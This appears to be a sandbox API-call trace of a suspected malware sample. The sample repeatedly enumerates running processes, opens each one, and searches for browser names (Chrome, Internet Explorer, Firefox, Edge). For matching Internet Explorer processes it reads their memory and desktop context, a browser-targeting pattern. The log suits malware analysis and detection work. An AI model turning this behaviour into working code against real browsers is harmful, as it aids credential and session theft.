	[0231.138] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.138] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.138] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0231.139] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x69f4
	[0231.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.139] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0231.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.139] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.139] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0231.139] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.139] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.140] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0231.140] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x69f8
	[0231.140] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.141] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0231.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.141] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.141] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.141] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0231.142] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.142] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.142] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0231.143] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x69fc
	[0231.143] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.143] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0231.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.144] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.144] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.144] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0231.145] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.145] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.145] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0231.146] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x6a00
	[0231.146] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.146] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0231.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.147] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.147] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.147] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0231.148] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.148] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.148] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0231.149] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x6a04
	[0231.149] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.149] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0231.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.150] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.150] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.150] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0231.151] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.151] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.151] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0231.152] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x6a08
	[0231.152] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.152] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0231.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.153] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.153] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.153] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0231.154] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.154] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.154] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0231.155] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x6a0c
	[0231.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.155] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0231.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.155] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0231.155] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.155] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0231.156] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.156] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.156] NtQueryInformationProcess (in: ProcessHandle=0x6a0c, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0231.156] ReadProcessMemory (in: hProcess=0x6a0c, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0231.156] ReadProcessMemory (in: hProcess=0x6a0c, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0231.156] ReadProcessMemory (in: hProcess=0x6a0c, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0231.156] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0231.157] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0231.157] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x6a10
	[0231.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.158] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0231.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.158] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0231.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.158] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0231.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.158] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.159] NtQueryInformationProcess (in: ProcessHandle=0x6a10, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0231.159] ReadProcessMemory (in: hProcess=0x6a10, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0231.159] ReadProcessMemory (in: hProcess=0x6a10, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0231.159] ReadProcessMemory (in: hProcess=0x6a10, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0231.159] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0231.159] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0231.160] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x6a14
	[0231.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.160] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0231.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.160] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.161] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0231.161] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.161] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.194] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0231.195] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x6a18
	[0231.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.195] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0231.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.195] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.195] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.195] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0231.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.196] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.196] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.197] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x6a1c
	[0231.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.197] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.197] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.198] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.198] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.205] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.205] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.206] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.206] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x6a20
	[0231.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.207] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.207] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.207] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.208] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.208] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.209] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x6a24
	[0231.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.209] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.209] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.210] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.210] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.210] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0231.211] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x6a28
	[0231.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.211] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0231.211] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.212] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.212] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0231.212] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.212] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.212] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0231.214] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x6a2c
	[0231.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.214] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.214] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.215] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.215] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.215] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.216] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x6a30
	[0231.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.216] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.216] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.216] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.217] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.217] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.217] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.217] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0231.218] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xda0) returned 0x6a34
	[0231.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.218] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0231.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.218] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.219] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0231.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.219] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.219] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xda0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0231.220] CloseHandle (hObject=0x4fd0) returned 1
	[0231.220] Sleep (dwMilliseconds=0x64) 
	[0231.319] GetCurrentProcessId () returned 0x110
	[0231.319] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0231.322] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0231.323] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0231.324] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0231.325] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x6a38
	[0231.325] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.325] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0231.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.326] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.326] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.326] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0231.327] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.327] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.327] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0231.328] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x6a3c
	[0231.328] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.328] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0231.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.329] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.329] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.329] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0231.330] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.330] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.330] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0231.331] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x6a40
	[0231.331] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.331] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0231.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.332] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.332] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.332] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0231.333] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.333] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.334] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0231.335] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x6a44
	[0231.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.335] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0231.335] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.335] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0231.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.336] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0231.336] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0231.336] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0231.337] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
